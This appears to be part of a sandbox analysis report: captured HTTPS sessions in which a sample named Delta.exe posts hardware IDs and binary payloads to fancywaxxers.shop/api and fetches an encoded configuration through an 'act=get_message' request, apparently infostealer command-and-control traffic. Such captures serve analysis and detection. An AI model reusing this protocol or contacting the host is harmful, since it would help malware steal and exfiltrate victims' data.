2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: 2d 2d 47 32 58 39 30 32 39 45 30 33 56 46 59 48 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 47 32 58 39 30 32 39 45 30 33 56 46 59 48 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 32 58 39 30 32 39 45 30 33 56 46 59 48 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 Data Ascii: --G2X9029E03VFYHYSCContent-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--G2X9029E03VFYHYSCContent-Disposition: form-data; name="pid"1--G2X9029E03VFYHYSCContent-Disposition: form-data; name="lid"yau6Na--91451098
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: 4a f1 83 a4 36 7e ea 3a c6 c4 89 ee 65 1b 3f 30 f9 14 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65 Data Ascii: J6~:e?08NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: 30 ef 31 cd d2 21 03 79 3e 56 72 52 97 96 5a 27 52 ea 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d Data Ascii: 01!y>VrRZ'R%0Zo[TqeuJ`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/KvtQ!3K4+EVh}8%tGJ:Ky.!,.v=0m
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: 0d 94 34 a6 19 bd bc f5 2c 96 2a c6 2e bb b9 9b 1e 65 fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26 Data Ascii: 4,*.eOhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim\|quzqZ1&
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: 9a 28 07 51 96 c2 a4 9e 71 d0 ff 8b 0a 97 e9 cb f3 5e da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db Data Ascii: (Qq^4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: 94 a4 66 2a c7 fd 48 d4 0d 26 c5 91 be 3d 8c 7a 7e 58 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13 Data Ascii: fH&=z~XV86E\|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;;f[ 8$oaq"^~kn
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: d4 ea f4 f6 f9 6f 37 aa 49 e9 ca 8a 7f da 45 1c 01 86 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43 Data Ascii: o7IEMv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8C
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: 97 05 21 25 41 c6 8a 6d c4 a3 83 c3 f9 8b 06 36 bd d9 c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c Data Ascii: !%Am6?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=\|XuvD7YPFOK<OX0/~h- Gy7e`9:y\|:pbl
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: c2 19 c0 69 3b fa 01 59 dc 39 d4 2e 43 54 87 7e e4 8f 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d Data Ascii: i;Y9.CT~w['@+FX3B?tb7Ikf[%&B\|@Pd?i>j,}up#KEF\#t63Yc+O\|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~M
2024-12-31 16:21:22 UTC	15331	OUT	Data Raw: ed 35 07 f5 4c be 48 e7 91 93 11 f4 97 37 25 27 4c 2d 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7 Data Ascii: 5LH7%'L-?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{
2024-12-31 16:21:24 UTC	1145	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:21:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nau6hi4v9g1nvbj76h2kip3tf3; expires=Sat, 26 Apr 2025 10:08:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fec70vtOOmQkApMfuxWGA%2BDzaWmLOdEr%2FB%2F539TLqUlowLrXnxPmc2S5VusbRs3bx%2B%2B1gaR7vQt1EkQACSxSj4PYObj57cS%2BqqdMbxsnNKDIMpVVYhsWg9lbsx4SA%2Brr2UvxTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9a2fded21a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1959&rtt_var=739&sent=192&recv=568&lost=0&retrans=0&sent_bytes=2844&recv_bytes=551996&delivery_rate=1475492&cwnd=157&unsent_bytes=0&cid=d3a54c5314b1c42c&ts=1607&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	104.21.96.1	443	7396	C:\Users\user\Desktop\Delta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:21:24 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: fancywaxxers.shop
2024-12-31 16:21:24 UTC	86	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 26 6a 3d 26 68 77 69 64 3d 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--914510980&j=&hwid=0227F22DABB37DE680FC103CECFC3A13
2024-12-31 16:21:25 UTC	1137	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:21:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5fhf852s8b1uhgolnk2ab5gki4; expires=Sat, 26 Apr 2025 10:08:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hgla7GkCdoZNG76pIyKm88%2FZhemZ0CsuvnyqYD%2BAIO%2F9gZop%2B1BdVu94XMDX%2BbxNANhyDmHJAXOXA48YvixpUNHOcDOPw6b0%2F2bP%2FlY0U2p7FuXh3edcVchJaF9wuMtBhYooqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9a3d2c83c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1673&rtt_var=655&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=987&delivery_rate=1635854&cwnd=178&unsent_bytes=0&cid=36031326661f268a&ts=452&x=0"
2024-12-31 16:21:25 UTC	232	IN	Data Raw: 33 36 39 38 0d 0a 53 51 54 37 6b 47 70 35 37 4e 31 68 4a 54 4f 75 74 38 47 57 65 55 65 48 72 67 5a 49 69 57 64 6a 6b 50 75 68 62 51 53 2b 45 44 59 53 66 39 6e 32 48 6c 76 57 37 45 30 48 56 6f 79 4e 38 4c 70 62 49 36 57 55 4a 41 2f 4c 4d 69 2f 57 67 5a 55 70 64 4e 45 6c 44 6e 35 48 75 50 46 54 4d 35 79 6f 53 68 4e 57 39 6f 65 6a 72 77 78 79 30 76 39 31 4c 37 34 54 56 50 75 79 79 6a 78 6c 30 53 56 67 48 54 65 32 79 44 6f 4f 6f 37 41 4c 53 31 6e 64 2f 6f 76 6b 53 53 72 71 6d 54 45 34 76 41 45 78 35 73 6d 57 41 56 62 39 61 6e 49 38 4e 34 37 42 41 79 75 75 72 41 74 4e 56 50 6a 30 75 66 56 53 42 72 48 50 53 53 37 47 45 41 54 39 6a 66 49 4d 5a 73 68 6c 57 43 55 39 76 4d 78 46 47 35 6d 4c 4a 47 Data Ascii: 3698SQT7kGp57N1hJTOut8GWeUeHrgZIiWdjkPuhbQS+EDYSf9n2HlvW7E0HVoyN8LpbI6WUJA/LMi/WgZUpdNElDn5HuPFTM5yoShNW9oejrwxy0v91L74TVPuyyjxl0SVgHTe2yDoOo7ALS1nd/ovkSSrqmTE4vAEx5smWAVb9anI8N47BAyuurAtNVPj0ufVSBrHPSS7GEAT9jfIMZshlWCU9vMxFG5mLJG
2024-12-31 16:21:25 UTC	1369	IN	Data Raw: 6c 36 34 59 43 6b 6f 7a 30 2f 77 75 6c 33 42 38 38 41 45 75 69 38 39 56 73 33 7a 43 42 34 4c 56 4b 34 32 44 30 32 6a 71 35 58 54 67 75 5a 33 50 6e 31 51 53 54 75 78 30 67 74 76 52 4d 35 38 73 4f 4b 42 53 2f 38 58 33 41 36 53 71 7a 38 45 7a 47 43 6c 54 55 52 64 64 66 78 6c 65 51 49 4d 4c 62 36 4e 53 72 77 45 51 71 68 79 63 6f 70 52 75 78 54 54 42 31 59 31 50 34 66 4b 4a 53 50 4a 31 42 5a 78 38 2f 34 7a 30 6f 47 72 4f 38 77 4b 63 59 42 4c 4f 65 63 7a 41 56 58 33 33 4a 34 4f 48 65 58 35 45 45 6c 77 37 38 58 63 33 62 69 2f 6f 37 75 48 48 4c 45 35 45 4d 50 2b 43 67 6b 30 61 37 74 4b 33 36 4b 52 45 59 6d 4d 63 4f 6e 4b 54 71 4e 35 43 74 56 52 70 69 42 70 4e 35 4a 4a 62 37 62 4d 33 6a 59 46 41 76 79 6a 35 59 47 54 64 56 42 56 79 59 77 6e 74 59 37 43 72 53 4e 42 Data Ascii: l64YCkoz0/wul3B88AEui89Vs3zCB4LVK42D02jq5XTguZ3Pn1QSTux0gtvRM58sOKBS/8X3A6Sqz8EzGClTURddfxleQIMLb6NSrwEQqhycopRuxTTB1Y1P4fKJSPJ1BZx8/4z0oGrO8wKcYBLOeczAVX33J4OHeX5EElw78Xc3bi/o7uHHLE5EMP+Cgk0a7tK36KREYmMcOnKTqN5CtVRpiBpN5JJb7bM3jYFAvyj5YGTdVBVyYwntY7CrSNB
2024-12-31 16:21:25 UTC	1369	IN	Data Raw: 43 72 2f 70 41 41 4e 75 42 5a 44 33 66 49 69 2f 5a 74 4a 59 49 4d 66 31 61 63 77 35 31 74 4e 63 6f 4c 4b 43 62 47 78 46 33 33 74 6a 30 72 6b 34 45 78 4d 38 2f 41 76 6b 53 53 4b 61 65 2b 56 31 6d 68 32 55 44 48 46 57 49 39 31 30 4e 32 37 59 6f 54 6d 4c 50 32 50 58 50 50 78 62 30 39 6c 59 76 78 67 6f 4a 2f 6f 48 53 4a 45 37 4d 49 46 73 6b 4d 38 7a 67 58 78 2b 2b 71 31 4d 53 58 2f 7a 30 75 4e 49 4d 64 50 4c 2f 62 78 72 4c 46 67 6e 34 6e 50 63 75 66 4e 30 37 64 33 39 6c 74 50 59 6c 44 6f 75 77 46 33 5a 53 7a 4d 47 30 2b 42 56 2b 77 50 49 70 4b 76 77 78 4a 74 79 79 37 6c 70 68 69 31 4e 38 44 45 4f 4b 33 79 30 37 75 5a 45 6e 58 77 66 71 78 36 36 6a 51 58 44 45 37 57 64 78 77 78 63 57 75 38 33 45 4e 54 54 63 4b 55 4e 38 55 61 72 6a 44 55 36 59 36 67 70 73 57 50 Data Ascii: Cr/pAANuBZD3fIi/ZtJYIMf1acw51tNcoLKCbGxF33tj0rk4ExM8/AvkSSKae+V1mh2UDHFWI910N27YoTmLP2PXPPxb09lYvxgoJ/oHSJE7MIFskM8zgXx++q1MSX/z0uNIMdPL/bxrLFgn4nPcufN07d39ltPYlDouwF3ZSzMG0+BV+wPIpKvwxJtyy7lphi1N8DEOK3y07uZEnXwfqx66jQXDE7WdxwxcWu83ENTTcKUN8UarjDU6Y6gpsWP
2024-12-31 16:21:25 UTC	1369	IN	Data Raw: 45 53 48 49 32 57 45 6b 33 43 6b 62 30 37 50 4a 44 6a 66 4b 4a 41 45 68 4c 36 33 56 4a 6a 69 75 6d 69 39 71 5a 65 58 61 6f 4e 41 58 46 4b 7a 63 4e 6e 37 49 4d 56 44 33 6c 4e 4e 65 63 66 39 44 5a 53 35 32 71 66 67 2b 4e 6f 43 74 4f 58 55 46 68 64 57 4c 38 77 38 69 73 4f 67 32 44 66 74 51 46 66 79 6a 35 6a 74 53 38 6b 4e 54 66 6c 32 35 39 51 59 78 6f 71 67 69 63 6d 62 69 37 61 53 6d 54 77 6a 46 6d 6b 55 59 77 77 45 2f 76 36 69 58 57 31 33 73 57 57 51 2f 62 49 72 30 44 54 6a 64 73 79 64 43 51 50 32 4f 36 71 41 41 42 64 75 42 63 79 72 76 50 54 4c 6a 6f 2b 31 64 56 63 74 43 63 41 4e 4d 6e 39 38 59 50 74 79 56 55 47 42 62 37 50 6d 49 2f 46 49 4a 34 38 4d 74 50 39 73 67 4c 2b 71 50 39 69 56 44 2b 6b 59 50 66 47 69 34 6f 6a 49 56 33 61 77 45 53 77 50 50 6a 34 6a Data Ascii: ESHI2WEk3Ckb07PJDjfKJAEhL63VJjiumi9qZeXaoNAXFKzcNn7IMVD3lNNecf9DZS52qfg+NoCtOXUFhdWL8w8isOg2DftQFfyj5jtS8kNTfl259QYxoqgicmbi7aSmTwjFmkUYwwE/v6iXW13sWWQ/bIr0DTjdsydCQP2O6qAABduBcyrvPTLjo+1dVctCcANMn98YPtyVUGBb7PmI/FIJ48MtP9sgL+qP9iVD+kYPfGi4ojIV3awESwPPj4j
2024-12-31 16:21:25 UTC	1369	IN	Data Raw: 74 74 58 4a 64 74 66 46 63 4b 54 78 41 52 4c 30 46 63 42 63 47 43 32 6f 6b 45 74 69 49 74 5a 54 67 48 4e 34 37 66 6a 53 6e 2f 51 38 69 6b 73 36 77 70 58 79 62 6a 6f 44 6e 33 52 53 68 30 65 55 72 7a 68 4a 54 2f 61 6c 43 74 47 55 64 6a 7a 73 4d 63 49 63 72 44 39 52 53 6e 74 56 67 76 6a 6e 39 4a 56 61 2b 6c 59 58 44 31 50 6c 73 49 68 4f 4b 6d 48 43 55 73 4c 33 4e 6a 33 77 30 45 6d 36 75 73 30 4a 2f 30 37 54 4d 6d 58 38 46 78 39 39 58 38 45 42 58 47 58 77 31 6f 76 6d 37 78 56 44 6e 37 48 68 4b 2f 46 53 79 76 6c 32 6b 4a 39 79 43 6f 78 79 72 44 4c 43 6d 50 66 52 45 4a 78 66 49 2f 61 44 42 62 48 6a 78 46 7a 66 38 44 78 67 38 38 68 47 36 6a 55 61 48 48 4f 4f 30 79 6b 7a 66 68 5a 64 4e 31 31 55 43 70 39 69 38 42 64 54 4c 71 6c 44 6e 5a 45 34 76 47 37 6f 45 45 66 Data Ascii: ttXJdtfFcKTxARL0FcBcGC2okEtiItZTgHN47fjSn/Q8iks6wpXybjoDn3RSh0eUrzhJT/alCtGUdjzsMcIcrD9RSntVgvjn9JVa+lYXD1PlsIhOKmHCUsL3Nj3w0Em6us0J/07TMmX8Fx99X8EBXGXw1ovm7xVDn7HhK/FSyvl2kJ9yCoxyrDLCmPfREJxfI/aDBbHjxFzf8Dxg88hG6jUaHHOO0ykzfhZdN11UCp9i8BdTLqlDnZE4vG7oEEf
2024-12-31 16:21:25 UTC	1369	IN	Data Raw: 2f 4f 41 42 62 64 6b 5a 67 4d 66 74 70 42 64 78 68 54 76 50 59 70 55 72 2b 49 41 6b 42 57 2b 63 36 75 2f 30 70 73 2f 76 67 31 45 76 77 6f 43 76 61 36 30 51 46 76 36 30 70 73 4b 45 66 4f 30 56 38 66 68 4a 41 70 62 48 7a 63 2f 35 75 39 4c 68 48 41 33 30 6b 75 2b 54 31 51 77 4c 2f 57 4b 55 2b 56 58 68 30 6b 59 4b 37 4b 4b 52 72 59 76 46 46 56 61 66 62 44 2b 50 30 77 49 50 37 6e 52 53 4c 43 4d 7a 2b 2f 6b 4f 67 47 56 64 39 2f 41 32 4a 6f 6c 66 4d 34 47 49 75 51 45 31 39 64 6d 4f 33 77 78 42 39 7a 38 2b 6f 77 4f 37 41 4a 57 76 4b 4f 7a 46 70 6f 78 6a 74 66 47 54 4f 53 2b 69 30 67 74 66 59 79 52 6c 62 4c 34 4c 76 75 44 48 44 77 6d 47 31 38 36 69 6f 4b 38 5a 62 39 51 6c 66 66 63 6b 41 64 62 71 6e 38 41 77 75 2f 71 41 35 6e 41 75 2f 48 68 66 30 4d 48 62 53 5a 4d Data Ascii: /OABbdkZgMftpBdxhTvPYpUr+IAkBW+c6u/0ps/vg1EvwoCva60QFv60psKEfO0V8fhJApbHzc/5u9LhHA30ku+T1QwL/WKU+VXh0kYK7KKRrYvFFVafbD+P0wIP7nRSLCMz+/kOgGVd9/A2JolfM4GIuQE19dmO3wxB9z8+owO7AJWvKOzFpoxjtfGTOS+i0gtfYyRlbL4LvuDHDwmG186ioK8Zb9QlffckAdbqn8Awu/qA5nAu/Hhf0MHbSZM
